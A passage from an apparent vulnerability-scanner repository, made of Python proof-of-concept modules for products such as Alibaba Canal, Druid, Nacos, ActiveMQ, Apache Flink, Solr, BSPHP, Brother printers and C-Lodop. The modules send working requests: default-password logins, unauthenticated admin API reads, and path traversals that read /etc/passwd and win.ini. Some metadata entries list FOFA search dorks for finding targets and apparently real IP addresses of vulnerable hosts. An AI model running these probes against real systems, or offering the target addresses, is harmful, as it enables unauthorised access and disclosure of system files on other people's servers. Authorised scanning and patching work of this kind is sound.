65 | req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
66 | if req.status_code == 200 and "\"result\":0,\"reason\":\"success\"" in req.text:
67 | vuln = [True,req.text]
68 | else:
69 | vuln = [False,req.text]
70 | except Exception as e:
71 | raise e
72 |
73 | if self._honeypot_check(vuln[1]) == True:
74 | vuln[0] = False
75 |
76 | return vuln
77 |
78 |
79 | def _attack(self):
80 | return self._verify()
--------------------------------------------------------------------------------
/poc/Alibaba_Canal/Weak_Pass/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 |
6 | # ...
7 | import urllib3
8 | urllib3.disable_warnings()
9 |
10 | class POC(POCBase):
11 |
12 | _info = {
13 | "author" : "hansi", # POC作者
14 | "version" : "1", # POC版本,默认是1
15 | "CreateDate" : "2022-1-10", # POC创建时间
16 | "UpdateDate" : "2022-1-10", # POC创建时间
17 | "PocDesc" : """
18 |
19 |
20 | """, # POC描述,写更新描述,没有就不写
21 |
22 | "name" : "AlibabaCanalconfig弱口令漏洞", # 漏洞名称
23 | "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
24 | "AppName" : "Alibaba_Canal", # 漏洞应用名称
25 | "AppVersion" : "无", # 漏洞应用版本
26 | "VulnDate" : "2021-03-10", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
27 | "VulnDesc" : """
28 |
29 | """, # 漏洞简要描述
30 |
31 | "fofa-dork":"", """
32 | title="Canal Admin"
33 | """ # fofa搜索语句
34 | "example" : "http://47.96.12.221:8089/", # 存在漏洞的演示url,写一个就可以了
35 | "exp_img" : "", # 先不管
36 |
37 | }
38 |
39 |
40 |
41 | def _verify(self):
42 | """
43 | 返回vuln
44 |
45 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
46 |
47 | 不存在漏洞:vuln = [False,""]
48 | """
49 | vuln = [False,""]
50 | url = self.target + "/api/v1/user/login" # url自己按需调整
51 | # date="command1=shell:ifconfig| dd of=/tmp/a.txt"
52 |
53 | headers = {"User-Agent":get_random_ua(),
54 | "Connection":"close",
55 | "Content-Type": "application/json;charset=UTF-8",
56 | }
57 | data = """
58 | {"username":"admin","password":"123456"}
59 | """
60 | try:
61 | """
62 | 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动
63 | """
64 | req = requests.post(url,headers = headers , data = data, proxies = self.proxy , timeout = self.timeout,verify = False)
65 | if "\"code\":20000,\"message\":null,\"data\"" in req.text and req.status_code == 200 :
66 | vuln = [True,req.text]
67 | else:
68 | vuln = [False,req.text]
69 | except Exception as e:
70 | raise e
71 |
72 | if self._honeypot_check(vuln[1]) == True:
73 | vuln[0] = False
74 |
75 | return vuln
76 |
77 |
78 | def _attack(self):
79 | return self._verify()
--------------------------------------------------------------------------------
/poc/Alibaba_Druid/Unauth_Access/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 |
class POC(POCBase):
    """Unauthenticated-access check for the Druid monitoring console.

    A single GET to ``/druid/index.html`` is issued; the instance is reported
    as exposed when the page comes back with HTTP 200 and contains the
    console's bootstrap call ``druid.index.init();``. From the defending
    side a hit means the monitoring console is served without credentials;
    put it behind authentication or restrict network access to it.
    """

    # Metadata consumed by the framework. Keys and values are data; keep verbatim.
    _info = {
        "author": "jijue",  # POC author
        "version": "1",  # POC version, defaults to 1
        "CreateDate": "2021-03-10",  # POC creation date
        "UpdateDate": "2021-03-10",  # POC last-updated date
        "PocDesc": """
略
""",  # POC description / update notes ("略" = omitted)
        "name": "Druid未授权访问",  # vulnerability name
        "VulnID": "",  # vulnerability id: CVE preferred, else CNVD, else blank
        "AppName": "druid",  # affected application
        "AppVersion": "全版本",  # affected versions ("全版本" = all versions)
        "VulnDate": "2021-03-10",  # disclosure date, format xxxx-xx-xx (earliest reference found if unknown)
        "VulnDesc": """
Druid是阿里巴巴数据库事业部出品,为监控而生的数据库连接池。
Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控。
当开发者配置不当时就可能造成未授权访问漏洞。
""",  # brief vulnerability description
        "fofa-dork": "",  # FOFA search query
        "example": "",  # demo URL of a vulnerable instance (one is enough)
        "exp_img": "",  # not used yet
    }

    # Per-request timeout in seconds, read as ``self.timeout`` below.
    # Presumably overrides a default declared on POCBase — confirm there.
    timeout = 10

    def _verify(self):
        """Run the check and return ``[is_vulnerable, page_source]``.

        Returns:
            list: ``[True, body]`` when the console page is served, otherwise
            ``[False, ""]``. The list is mutable on purpose: the honeypot
            filter below may flip the flag.

        Raises:
            Any exception from the HTTP call propagates unchanged; there is
            no local error handling.
        """
        endpoint = self.target + "/druid/index.html"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Windows ME; U; en) Opera 8.51",
            "Connection": "close",
        }

        # verify=False as authored; the matching urllib3 warning is silenced
        # at module import.
        resp = requests.get(
            endpoint,
            headers=request_headers,
            proxies=self.proxy,
            timeout=self.timeout,
            verify=False,
        )
        exposed = resp.status_code == 200 and "druid.index.init();" in resp.text
        result = [True, resp.text] if exposed else [False, ""]

        # Honeypot responses are demoted to "not vulnerable". ``== True`` is
        # kept as authored: _honeypot_check is defined outside this class
        # (presumably on POCBase) and its exact return type is not visible.
        if self._honeypot_check(result[1]) == True:
            result[0] = False

        return result

    def _attack(self):
        """No separate exploit step in this POC; attack mode re-runs _verify."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/Alibaba_Nacos/Unauth_Access/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
class POC(POCBase):
    """Unauthenticated user-list exposure check for Alibaba Nacos.

    Issues one GET to ``/v1/auth/users?pageNo=1&pageSize=100`` carrying the
    fixed ``User-Agent: Nacos-Server`` header the POC was authored with
    (VulnDesc attributes the issue to User-Agent handling) and reports a hit
    when the reply is HTTP 200 and contains both ``username`` and
    ``pageItems``. A hit means the user listing is readable without
    credentials; enforce authentication on that API and restrict who can
    reach the console.
    """

    _info = {
        "author": "jijue",  # POC author
        "version": "1",  # POC version, defaults to 1
        "CreateDate": "2021-06-08",  # POC creation date
        "UpdateDate": "2021-06-08",  # POC last-updated date
        "PocDesc": """
略
""",  # POC description / update notes ("略" = omitted)
        "name": "Nacos未授权访问",  # vulnerability name
        "VulnID": "",  # vulnerability id: CVE preferred, else CNVD, else blank
        "AppName": "Nacos",  # affected application
        "AppVersion": "Nacos <= 2.0.0-ALPHA.1",  # affected versions
        "VulnDate": "2020-12-29",  # disclosure date, format xxxx-xx-xx (earliest reference found if unknown)
        "VulnDesc": """
Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。
""",  # brief vulnerability description
        "fofa-dork": """
title="Nacos"
""",  # FOFA search query
        "example": "https://47.108.74.113/v1/auth/users?pageNo=1&pageSize=100",  # demo URL of a vulnerable instance
        "exp_img": "",  # not used yet
    }

    # Seconds; read as self.timeout below (presumably overrides a POCBase default — confirm).
    timeout = 10

    def _verify(self):
        """Fetch the user listing and return ``[is_vulnerable, body]``.

        Returns:
            list: ``[True, body]`` on a hit, ``[False, body]`` otherwise; the
            honeypot filter may flip a hit back to ``False``.

        Raises:
            Any exception from the HTTP call propagates unchanged.
        """
        users_endpoint = self.target + "/v1/auth/users?pageNo=1&pageSize=100"
        # The fixed User-Agent value is the distinguishing part of this probe
        # (see VulnDesc); the Content-Type header is sent on a GET as authored.
        request_headers = {
            "User-Agent": "Nacos-Server",
            "Connection": "close",
            "Content-Type": "application/x-www-form-urlencoded",
        }

        resp = requests.get(
            users_endpoint,
            headers=request_headers,
            proxies=self.proxy,
            timeout=self.timeout,
            verify=False,  # as authored; urllib3 warning silenced at import
        )
        body = resp.text
        listed = resp.status_code == 200 and "username" in body and "pageItems" in body
        result = [True, body] if listed else [False, body]

        # ``== True`` kept as authored; _honeypot_check's return type is not
        # visible from this file.
        if self._honeypot_check(result[1]) == True:
            result[0] = False

        return result

    def _attack(self):
        """No separate exploit step; attack mode re-runs _verify."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/Apache_ActiveMQ/Physical_Path_Disclosure/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
class POC(POCBase):
    """Physical-path disclosure check for Apache ActiveMQ's fileserver.

    Sends one PUT to the authored non-existent path under ``/fileserver/``
    with a fixed Basic credential header and reports a hit when the server
    answers HTTP 500 with a reason phrase other than the generic
    ``Server Error`` (as authored, a non-generic reason is taken to carry the
    path disclosure). Defensively, a hit means PUT is enabled on the
    fileserver and error pages leak filesystem layout; disable the servlet
    or PUT and return generic errors.
    """

    _info = {
        "author": "jijue",  # POC author
        "version": "1",  # POC version, defaults to 1
        "CreateDate": "2022-01-01",  # POC creation date
        "UpdateDate": "2022-01-01",  # POC last-updated date
        "PocDesc": """
略
""",  # POC description / update notes ("略" = omitted)
        "name": "ActiveMQ物理路径泄漏漏洞",  # vulnerability name
        "VulnID": "oFx-2022-0001",  # vulnerability id: CVE preferred, else CNVD; here a project-internal id
        "AppName": "ActiveMQ",  # affected application
        "AppVersion": "",  # affected versions
        "VulnDate": "2022-01-01",  # disclosure date, format xxxx-xx-xx (today if unknown)
        "VulnDesc": """
ActiveMQ默认开启PUT请求,当开启PUT时,构造好Payload(即不存在的目录),Response会返回相应的物理路径信息
""",  # brief vulnerability description
        "fofa-dork": """
app="APACHE-ActiveMQ"
""",  # FOFA search query
        "example": "",  # demo URL of a vulnerable instance (one is enough)
        "exp_img": "",  # not used yet
    }

    def _verify(self):
        """PUT the authored path and inspect the error reply.

        Returns:
            list: ``[True, body]`` on a hit, ``[False, body]`` otherwise; the
            honeypot filter may flip a hit back to ``False``.

        Raises:
            Any exception from the HTTP call propagates unchanged. An
            AttributeError from the private attribute access noted below
            would propagate the same way.
        """
        probe_path = self.target + "/fileserver/a../../%08/..%08/.%08/%08"
        request_headers = {
            "User-Agent": get_random_ua(),
            "Connection": "close",
            "Authorization": "Basic YWRtaW46YWRtaW4=",  # fixed credential header as authored
        }

        resp = requests.put(
            probe_path,
            headers=request_headers,
            proxies=self.proxy,
            timeout=self.timeout,
            verify=False,  # as authored; urllib3 warning silenced at import
        )
        # Order matters: the reason phrase is only read after the status
        # check, exactly as authored (short-circuit).
        # NOTE(review): ``raw._original_response`` is a private attribute of
        # the underlying urllib3 response, not a public requests API; it may
        # be absent or renamed in other library versions.
        disclosed = (
            resp.status_code == 500
            and resp.raw._original_response.reason != "Server Error"
        )
        result = [True, resp.text] if disclosed else [False, resp.text]

        # Use as appropriate: honeypot responses are demoted. ``== True`` is
        # kept as authored; _honeypot_check's return type is not visible here.
        if self._honeypot_check(result[1]) == True:
            result[0] = False

        return result

    def _attack(self):
        """No separate exploit step; attack mode re-runs _verify."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/Apache_ActiveUC/Active_UC_Info_Disclosure/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
class POC(POCBase):
    """Information-disclosure check for the Active UC unified communication platform.

    Issues one GET to ``/acenter/monitoring`` and reports a hit when the reply
    is HTTP 200 and contains ``监控系统``. A hit means the monitoring page is
    reachable without credentials; restrict it or enforce authentication.
    """

    _info = {
        "author": "hansi",  # POC author
        "version": "1",  # POC version, defaults to 1
        "CreateDate": "2022-01-12",  # POC creation date
        "UpdateDate": "2022-01-12",  # POC last-updated date
        "PocDesc": """
略
""",  # POC description / update notes ("略" = omitted)
        "name": "网动统一通信平台Active UC存在信息泄露漏洞",  # vulnerability name
        "VulnID": "",  # vulnerability id: CVE preferred, else CNVD, else blank
        "AppName": "",  # affected application
        "AppVersion": "",  # affected versions
        "VulnDate": "2022-03-04",  # disclosure date, format xxxx-xx-xx (today if unknown)
        "VulnDesc": """

""",  # brief vulnerability description (left empty by the author)
        "fofa-dork": """

title="网动统一通信平台"
""",  # FOFA search query
        "example": "http://60.205.143.8/acenter/monitoring",  # demo URL of a vulnerable instance
        "exp_img": "",  # not used yet
    }

    def _verify(self):
        """Fetch the monitoring page and return ``[is_vulnerable, body]``.

        Returns:
            list: ``[True, body]`` on a hit, ``[False, body]`` otherwise; the
            honeypot filter may flip a hit back to ``False``.

        Raises:
            Any exception from the HTTP call propagates unchanged.
        """
        monitoring_url = self.target + "/acenter/monitoring"
        request_headers = {
            "User-Agent": get_random_ua(),
            "Connection": "close",
        }

        resp = requests.get(
            monitoring_url,
            headers=request_headers,
            proxies=self.proxy,
            timeout=self.timeout,  # no class-level override here; comes from the base
            verify=False,  # as authored; urllib3 warning silenced at import
        )
        page_served = resp.status_code == 200 and "监控系统" in resp.text
        result = [True, resp.text] if page_served else [False, resp.text]

        # Use as appropriate: honeypot responses are demoted. ``== True`` is
        # kept as authored; _honeypot_check's return type is not visible here.
        if self._honeypot_check(result[1]) == True:
            result[0] = False

        return result

    def _attack(self):
        """No separate exploit step; attack mode re-runs _verify."""
        return self._verify()
76 |
--------------------------------------------------------------------------------
/poc/Apache_Flink/Dir_Traversal_CVE-2020-17519/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 |
6 | # ...
7 | import urllib3
8 | urllib3.disable_warnings()
9 |
class POC(POCBase):
    """Directory-traversal check for Apache Flink's JobManager log endpoint (CVE-2020-17519).

    Issues one GET to the authored double-encoded traversal path under
    ``/jobmanager/logs/`` and reports a hit when the reply is HTTP 200 and
    contains ``root:/root``. A hit means the JobManager serves arbitrary
    files; upgrade past the affected release and keep the REST port off
    untrusted networks.
    """

    _info = {
        "author": "jijue",  # POC author
        "version": "1",  # POC version, defaults to 1
        "CreateDate": "2021-06-09",  # POC creation date
        "UpdateDate": "2021-06-09",  # POC last-updated date
        "PocDesc": """
略
""",  # POC description / update notes ("略" = omitted)
        "name": "Apache Flink目录穿透(CVE-2020-17519)",  # vulnerability name
        "VulnID": "CVE-2020-17519",  # vulnerability id: CVE preferred, else CNVD, else blank
        "AppName": "Apache Flink",  # affected application
        "AppVersion": "Apache Flink 1.11.0",  # affected versions
        "VulnDate": "2020-01-01",  # disclosure date, format xxxx-xx-xx (today if unknown)
        "VulnDesc": """

""",  # brief vulnerability description (left empty by the author)
        "fofa-dork": "",  # FOFA search query
        "example": "",  # demo URL of a vulnerable instance (one is enough)
        "exp_img": "",  # not used yet
    }

    # Seconds; read as self.timeout below (presumably overrides a POCBase default — confirm).
    timeout = 10

    def _verify(self):
        """Request the traversal path and return ``[is_vulnerable, body]``.

        Returns:
            list: ``[True, body]`` on a hit, ``[False, body]`` otherwise; the
            honeypot filter may flip a hit back to ``False``.

        Raises:
            Any exception from the HTTP call propagates unchanged.
        """
        traversal_url = (
            self.target
            + "/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
        )
        request_headers = {
            "User-Agent": get_random_ua(),
            "Connection": "close",
        }

        resp = requests.get(
            traversal_url,
            headers=request_headers,
            proxies=self.proxy,
            timeout=self.timeout,
            verify=False,  # as authored; urllib3 warning silenced at import
        )
        file_returned = resp.status_code == 200 and "root:/root" in resp.text
        result = [True, resp.text] if file_returned else [False, resp.text]

        # Honeypot responses are demoted. ``== True`` kept as authored;
        # _honeypot_check's return type is not visible here.
        if self._honeypot_check(result[1]) == True:
            result[0] = False

        return result

    def _attack(self):
        """No separate exploit step; attack mode re-runs _verify."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/Apache_Flink/RCE_CVE_2020_17518/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
class POC(POCBase):
    """Presence check for the Apache Flink jar-upload endpoint (CVE-2020-17518).

    This POC does not exercise the vulnerability: it issues a plain GET to
    ``/jars/upload`` and reports a hit when the body contains the literal
    ``Unable to load requested file /jars/upload.``, i.e. when the endpoint
    exists. As PocDesc already states, a hit means "possibly vulnerable",
    not confirmed. Defensively, treat a hit as "jar upload reachable" and
    verify the running version before acting.
    """

    _info = {
        "author": "jijue",  # POC author
        "version": "1",  # POC version, defaults to 1
        "CreateDate": "2021-06-09",  # POC creation date
        "UpdateDate": "2021-06-09",  # POC last-updated date
        "PocDesc": """
这个POC只能说检测结果是可能存在漏洞,不是一定的
""",  # POC description: the author notes the result only indicates a possible vulnerability
        "name": "Apache Flink <= 1.9.1远程代码执行 CVE-2020-17518",  # vulnerability name
        "VulnID": "CVE-2020-17518",  # vulnerability id: CVE preferred, else CNVD, else blank
        "AppName": "Apache Flink",  # affected application
        "AppVersion": "Apache Flink <= 1.9.1",  # affected versions
        "VulnDate": "2021-06-09",  # disclosure date, format xxxx-xx-xx (today if unknown)
        "VulnDesc": """
通过构造恶意的http header,可实现远程文件写入
""",  # brief vulnerability description
        "fofa-dork": """

""",  # FOFA search query (left empty by the author)
        "example": "",  # demo URL of a vulnerable instance (one is enough)
        "exp_img": "",  # not used yet
    }

    def _verify(self):
        """GET the upload endpoint and return ``[is_vulnerable, body]``.

        Returns:
            list: ``[True, body]`` when the endpoint's "unable to load" text
            is present (status code is not checked, as authored), otherwise
            ``[False, body]``; the honeypot filter may flip a hit to ``False``.

        Raises:
            Any exception from the HTTP call propagates unchanged.
        """
        upload_endpoint = self.target + "/jars/upload"
        request_headers = {
            "User-Agent": get_random_ua(),
            "Connection": "close",
        }

        resp = requests.get(
            upload_endpoint,
            headers=request_headers,
            proxies=self.proxy,
            timeout=self.timeout,  # no class-level override here; comes from the base
            verify=False,  # as authored; urllib3 warning silenced at import
        )
        endpoint_present = "Unable to load requested file /jars/upload." in resp.text
        result = [True, resp.text] if endpoint_present else [False, resp.text]

        # Use as appropriate: honeypot responses are demoted. ``== True`` is
        # kept as authored; _honeypot_check's return type is not visible here.
        if self._honeypot_check(result[1]) == True:
            result[0] = False

        return result

    def _attack(self):
        """No separate exploit step; attack mode re-runs _verify."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/Apache_Solr/Unauth_Access/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 |
class POC(POCBase):
    """Unauthenticated-access check for the Apache Solr admin cores API.

    Issues one GET to ``/solr/admin/cores`` and reports a hit when the reply
    is HTTP 200 and contains ``responseHeader``. A hit means the admin API
    answers without credentials; enable authentication on Solr and restrict
    network access to the admin interface.
    """

    _info = {
        "author": "Du9r1",  # POC author
        "version": "1",  # POC version, defaults to 1
        "CreateDate": "2022-11-2",  # POC creation date — NOTE(review): not zero-padded, unlike the xxxx-xx-xx convention
        "UpdateDate": "2022-11-2",  # POC last-updated date (same formatting note)
        "PocDesc": """
略
""",  # POC description / update notes ("略" = omitted)
        "name": "Solr未授权访问",  # vulnerability name
        "VulnID": "",  # vulnerability id: CVE preferred, else CNVD, else blank
        "AppName": "solr",  # affected application
        "AppVersion": "全版本",  # affected versions ("全版本" = all versions)
        "VulnDate": "2021-03-10",  # disclosure date, format xxxx-xx-xx (earliest reference found if unknown)
        "VulnDesc": """
Solr应用服务器安装后未进行管理界面访问限制,导致管理界面可直接进行访问,泄露敏感信息并可对Solr进行进一步的管理。
当开发者配置不当时就可能造成未授权访问漏洞。
""",  # brief vulnerability description
        "fofa-dork": 'title="solr"&&country="CN"',  # FOFA search query
        "example": "",  # demo URL of a vulnerable instance (one is enough)
        "exp_img": "",  # not used yet
    }

    # Seconds; read as self.timeout below (presumably overrides a POCBase default — confirm).
    timeout = 10

    def _verify(self):
        """Fetch the cores listing and return ``[is_vulnerable, body]``.

        Returns:
            list: ``[True, body]`` on a hit, ``[False, ""]`` otherwise; the
            honeypot filter may flip a hit back to ``False``.

        Raises:
            Any exception from the HTTP call propagates unchanged.
        """
        cores_endpoint = self.target + "/solr/admin/cores"
        # User-Agent value reproduced exactly as authored (including "U;cd en").
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Windows ME; U;cd en) Opera 8.51",
            "Connection": "close",
        }

        resp = requests.get(
            cores_endpoint,
            headers=request_headers,
            proxies=self.proxy,
            timeout=self.timeout,
            verify=False,  # as authored; urllib3 warning silenced at import
        )
        api_open = resp.status_code == 200 and "responseHeader" in resp.text
        result = [True, resp.text] if api_open else [False, ""]

        # Honeypot responses are demoted. ``== True`` kept as authored;
        # _honeypot_check's return type is not visible here.
        if self._honeypot_check(result[1]) == True:
            result[0] = False

        return result

    def _attack(self):
        """No separate exploit step; attack mode re-runs _verify."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/BSPHP/Info_Disclosure/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
class POC(POCBase):
    """Unauthenticated log-API exposure check for BSPHP.

    Issues one GET to the authored ``admin/index.php`` log-table query and
    reports a hit when the response advertises ``application/json`` and the
    body starts a ``{"data":[{"key":`` structure. A hit means the admin log
    listing (user IPs / account names per VulnDesc) is readable without a
    session; enforce authentication on the admin controller.
    """

    _info = {
        "author": "jijue",  # POC author
        "version": "1",  # POC version, defaults to 1
        "CreateDate": "2021-06-09",  # POC creation date
        "UpdateDate": "2021-06-09",  # POC last-updated date
        "PocDesc": """
略
""",  # POC description / update notes ("略" = omitted)
        "name": "BSPHP 未授权访问 信息泄露漏洞",  # vulnerability name
        "VulnID": "oFx-2021-0001",  # project-internal id; the same value is reused by several POCs in this repo
        "AppName": "BSPHP",  # affected application
        "AppVersion": "",  # affected versions
        "VulnDate": "2021-06-09",  # disclosure date, format xxxx-xx-xx (today if unknown)
        "VulnDesc": """
BSPHP 存在未授权访问 泄露用户 IP 和 账户名信息
""",  # brief vulnerability description
        "fofa-dork": """
"BSPHP"
""",  # FOFA search query
        "example": "",  # demo URL of a vulnerable instance (one is enough)
        "exp_img": "",  # not used yet
    }

    def _verify(self):
        """Query the log table and return ``[is_vulnerable, body]``.

        Returns:
            list: ``[True, body]`` on a hit, ``[False, body]`` otherwise; the
            honeypot filter may flip a hit back to ``False``.

        Raises:
            Any exception from the HTTP call propagates unchanged.
            NOTE(review): a response without a Content-Type header raises
            KeyError on the header lookup below, which also propagates.
        """
        # Query string reproduced exactly as authored; note the final
        # character is U+2018 (a typographic left quote), not an ASCII quote.
        log_query_url = (
            self.target
            + "/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0‘"
        )
        request_headers = {
            "User-Agent": get_random_ua(),
            "Connection": "close",
        }

        resp = requests.get(
            log_query_url,
            headers=request_headers,
            proxies=self.proxy,
            timeout=self.timeout,  # no class-level override here; comes from the base
            verify=False,  # as authored; urllib3 warning silenced at import
        )
        # Header check first, body check second — same short-circuit order
        # as authored. The status code is not examined.
        json_listing = (
            "application/json" in str(resp.headers["Content-Type"])
            and '{"data":[{"key":' in resp.text
        )
        result = [True, resp.text] if json_listing else [False, resp.text]

        # Use as appropriate: honeypot responses are demoted. ``== True`` is
        # kept as authored; _honeypot_check's return type is not visible here.
        if self._honeypot_check(result[1]) == True:
            result[0] = False

        return result

    def _attack(self):
        """No separate exploit step; attack mode re-runs _verify."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/Brother MFC-L2730DW/Weak_Pass/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
class POC(POCBase):
    """Default-login check for the Brother MFC-L2730DW series web console.

    Posts the fixed form body the POC was authored with to
    ``/general/status.html`` and reports a hit when the reply contains
    ``Administrator``. A hit means the console accepts the default login;
    set an administrator password and keep the printer off untrusted networks.
    """

    _info = {
        "author": "hansi",  # POC author
        "version": "1",  # POC version, defaults to 1
        "CreateDate": "2022-09-07",  # POC creation date
        "UpdateDate": "2022-09-07",  # POC last-updated date
        "PocDesc": """
略
""",  # POC description / update notes ("略" = omitted)
        "name": "Brother MFC-L2730DW series弱口令漏洞",  # vulnerability name
        "VulnID": "oFx-2022-0906",  # project-internal id (CVE preferred, else CNVD, when available)
        "AppName": "",  # affected application
        "AppVersion": "",  # affected versions
        "VulnDate": "2022-09-07",  # disclosure date, format xxxx-xx-xx (today if unknown)
        "VulnDesc": """

""",  # brief vulnerability description (left empty by the author)
        "fofa-dork": """
title="Brother HL-L8360CDW series"
""",  # FOFA search query — NOTE(review): names a different model than "name" above; confirm intended
        "example": "",  # demo URL of a vulnerable instance (one is enough)
        "exp_img": "",  # not used yet
    }

    def _verify(self):
        """Post the login form and return ``[is_vulnerable, body]``.

        Returns:
            list: ``[True, body]`` when ``Administrator`` appears in the reply
            (status code is not checked, as authored), otherwise
            ``[False, body]``; the honeypot filter may flip a hit to ``False``.

        Raises:
            Any exception from the HTTP call propagates unchanged.
        """
        status_page = self.target + "/general/status.html"
        # Fixed form body as authored, including a static CSRFToken value.
        form_body = "CSRFToken=uDmE4RvNEHZfHNtcOruqZPtWbT3IjovV%2B4zyo6cxVUZWt2Loyw%3D%3D&B5be=initpass&loginurl=%2Fgeneral%2Fstatus.html"
        request_headers = {
            "User-Agent": get_random_ua(),
            "Connection": "close",
        }

        resp = requests.post(
            status_page,
            headers=request_headers,
            data=form_body,
            proxies=self.proxy,
            timeout=self.timeout,  # no class-level override here; comes from the base
            verify=False,  # as authored; urllib3 warning silenced at import
        )
        admin_page = "Administrator" in resp.text
        result = [True, resp.text] if admin_page else [False, resp.text]

        # Use as appropriate: honeypot responses are demoted. ``== True`` is
        # kept as authored; _honeypot_check's return type is not visible here.
        if self._honeypot_check(result[1]) == True:
            result[0] = False

        return result

    def _attack(self):
        """No separate exploit step; attack mode re-runs _verify."""
        return self._verify()
74 |
--------------------------------------------------------------------------------
/poc/C_Lodop/File_Read/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 |
6 | # ...
7 | import urllib3
8 | urllib3.disable_warnings()
9 |
class POC(POCBase):
    """Arbitrary-file-read check for the C-Lodop cloud print service.

    Issues one GET to the authored encoded traversal path targeting
    ``windows/win.ini`` and reports a hit when the reply is HTTP 200 and
    contains ``; for 16-bit app support``. A hit means the service serves
    files outside its web root; update it and keep it off untrusted networks.
    """

    _info = {
        "author": "hansi",  # POC author
        "version": "1",  # POC version, defaults to 1
        "CreateDate": "2021-07-01",  # POC creation date
        "UpdateDate": "2021-07-01",  # POC last-updated date
        "PocDesc": """
略
""",  # POC description / update notes ("略" = omitted)
        "name": "C-Lodop 云打印机系统平台任意文件读取漏洞",  # vulnerability name
        "VulnID": "",  # vulnerability id: CVE preferred, else CNVD, else blank
        "AppName": "",  # affected application
        "AppVersion": "C-Lodop C-Lodop打印服务系统 2.0.4.7",  # affected versions
        "VulnDate": "2021-07-01",  # disclosure date, format xxxx-xx-xx (today if unknown)
        "VulnDesc": """
C-Lodop打印服务系统是一款云打印软件。 C-Lodop打印服务系统存在任意文件读取漏洞,攻击者可利用漏洞获取敏感信息。
""",  # brief vulnerability description
        "fofa-dork": """
title="Welcome to C-Lodop"
""",  # FOFA search query
        "example": "http://59.48.144.170:8000",  # demo URL of a vulnerable instance
        "exp_img": "",  # not used yet
    }

    # Seconds; read as self.timeout below (presumably overrides a POCBase default — confirm).
    timeout = 10

    def _verify(self):
        """Request the traversal path and return ``[is_vulnerable, body]``.

        Returns:
            list: ``[True, body]`` on a hit, ``[False, body]`` otherwise; the
            honeypot filter may flip a hit back to ``False``.

        Raises:
            Any exception from the HTTP call propagates unchanged.
        """
        traversal_url = (
            self.target
            + "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini"
        )
        request_headers = {
            "User-Agent": get_random_ua(),
            "Connection": "close",
        }

        resp = requests.get(
            traversal_url,
            headers=request_headers,
            proxies=self.proxy,
            timeout=self.timeout,
            verify=False,  # as authored; urllib3 warning silenced at import
        )
        ini_returned = resp.status_code == 200 and "; for 16-bit app support" in resp.text
        result = [True, resp.text] if ini_returned else [False, resp.text]

        # Honeypot responses are demoted. ``== True`` kept as authored;
        # _honeypot_check's return type is not visible here.
        if self._honeypot_check(result[1]) == True:
            result[0] = False

        return result

    def _attack(self):
        """No separate exploit step; attack mode re-runs _verify."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
class POC(POCBase):
